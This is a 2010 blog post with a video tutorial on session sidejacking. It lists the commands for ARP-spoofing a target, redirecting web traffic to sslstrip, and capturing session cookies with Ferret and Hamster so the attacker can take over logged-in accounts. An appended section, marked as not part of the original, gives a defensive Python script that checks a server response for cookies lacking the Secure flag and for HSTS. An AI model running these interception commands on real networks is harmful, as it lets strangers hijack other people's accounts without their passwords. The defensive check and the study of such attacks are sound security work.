Monday, June 7, 2010

[Video] Session Sidejacking (Ferret and Hamster)

Watch video on-line:
Download video:

What is this?
This video demos how to do "Session Sidejacking". Sidejacking is where you clone your target's cookies, so you are "sharing" their identity for that account (without ever knowing the username or password)!

What do I need?

> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*

Name: arpspoof (DSniff)
Version: 2.3
Home Page:
Download Link:

Name: sslstrip
Version: 0.6
Home Page:
Download Link:

Name: Hamster Sidejacking Tool
Version: 2.0
Home Page:
Download Link:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0


Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually.
Konqueror -> http://hamster
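
From the defender's side, the capture above only works if the browser sends its session cookies over plain HTTP once sslstrip has downgraded the connection. The following added example (not part of the original post or video) checks a response for the two settings that prevent that: the Secure attribute on each cookie and a Strict-Transport-Security header. The sample response, cookie names and function names are constructed for illustration.

```python
# Added defensive example. SAMPLE_RESPONSE is constructed; cookie names are made up.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/; HttpOnly\r\n"
    "Set-Cookie: csrf=xyz789; Path=/; Secure; HttpOnly\r\n"
    "Set-Cookie: theme=dark; Path=/\r\n"
    "\r\n"
    "<html></html>"
)

def parse_headers(raw):
    """Return (lowercased name, value) pairs from the header part of a raw response."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def hsts_enabled(headers):
    """True if Strict-Transport-Security is present with max-age > 0."""
    for name, value in headers:
        if name != "strict-transport-security":
            continue
        for part in value.split(";"):
            key, _, val = part.strip().partition("=")
            if key.lower() == "max-age" and val.strip('"').isdigit():
                return int(val.strip('"')) > 0
    return False

def sniffable_cookies(headers):
    """Names of cookies set without Secure, i.e. ones a browser will send over HTTP."""
    exposed = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        attrs = {p.partition("=")[0].lower() for p in parts[1:]}
        if "secure" not in attrs:
            exposed.append(parts[0].partition("=")[0])
    return exposed

if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_RESPONSE)
    print("HSTS enabled:", hsts_enabled(hdrs))
    print("Cookies sent over plain HTTP:", sniffable_cookies(hdrs))
```

Strict-Transport-Security only protects browsers that have already received the header over HTTPS (or sites on a preload list), so session cookies still need the Secure attribute.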

1 comment:

  1. Hello!
    I'd like to take your article, but the video link is broken; I hope you can fix it!